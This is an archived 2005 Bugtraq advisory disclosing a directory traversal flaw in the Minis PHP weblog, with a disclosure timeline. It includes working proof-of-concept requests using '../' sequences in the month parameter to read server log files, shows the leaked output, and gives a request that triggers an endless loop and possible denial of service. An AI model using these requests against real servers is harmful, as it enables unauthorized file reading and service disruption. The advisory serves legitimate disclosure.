[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Minis directory traversal vulnerability
From: Madelman <madelman () iname ! com>
Date: 2005-01-16 18:04:16
Message-ID: 41EAACA0.1040700 () iname ! com
[Download RAW message or body]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Title: Minis directory traversal vulnerability
Vulnerability discovery: Madelman <madelman AT iname.com>
Date: 31/12/2004
Severity: Moderate
Summary:
- --------
(from vendor site: http://minis.sourceforge.net/)
Minis is a tiny, PHP-powered, text-file based weblogging system.
It is easily configured for normal use and it doesnt require any
databases, such as MySQL. Also, with some PHP-knowledge youll be
able to configure Minis endlessly.
Minis doesn't check the month parameter which allows reading any file with .log \
extension
This vulnerability has been tested with Minis 0.2.1
Details:
- --------
If we want to read /var/log/XFree86.0.log:
REQUEST:
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/XFree86.0
RETURNS: (looking at source of HTML)
[...]
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=This \
is a pre-release version of XFree86, and is not supported in any "></a><br>: <a \
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=way. Bugs may \
be reported to XFree86@XFree86.Org and patches submitted "></a><br>: <a \
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=to \
fixes@XFree86.Org. Before reporting bugs in pre-release versions, "></a><br>: <a \
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=please check \
the latest version in the XFree86 CVS repository "></a><br>: <a \
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=(http://www.XFree86.Org/cvs).
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=XFree86 \
Version 4.3.0.1 (Debian 4.3.0.dfsg.1-4 20040529113443 \
root@cyberhq.internal.cyberhqz.com) "></a><br>: <a \
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Release Date: \
15 August 2003 "></a><br>: <a \
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=X Protocol \
Version 11, Revision 0, Release 6.6 "></a><br>: <a \
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Build Operating \
System: Linux 2.6.6-rc3-bk9 i686 [ELF] "></a><br>: <a \
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Build Date: 29 \
May 2004 [...]
If we try to read a file that doesn't exist (in this example /var/log/XFree86.log) \
Minis returns "No such month"
REQUEST:
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/XFree86
RESPONSE:
No such month.
If we try to read a file the webserver doesn't have autorization to, Minis enters an \
endless loop which could cause an incredible amount of bandwith spent by the server \
or even a DoS
REQUEST:
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/auth
RETURNS:
Warning: fopen(blog/../../../../../../../../var/log/auth.log): failed to open stream: \
Permission denied in /var/www/minis/minis.php on line 109
../../../../../../../../var/log/auth
Warning: feof(): supplied argument is not a valid stream resource in \
/var/www/minis/minis.php on line 111
Warning: fgets(): supplied argument is not a valid stream resource in \
/var/www/minis/minis.php on line 112
Warning: feof(): supplied argument is not a valid stream resource in \
/var/www/minis/minis.php on line 111
Warning: fgets(): supplied argument is not a valid stream resource in \
/var/www/minis/minis.php on line 112 [...]
Timeline
- --------
31/12/2004 - Vulnerability found
31/12/2004 - Vendor contacted
16/01/2005 - Vendor hasn't replied. Advisory released
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org
iD8DBQFB6qyg3RWooxY20cIRAg4cAJ41z36lEK44et5nx4V6tspofoo+zACgnLr6
nUEj8oDBySiBN2ScbMinO7s=
=sSF1
-----END PGP SIGNATURE-----
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic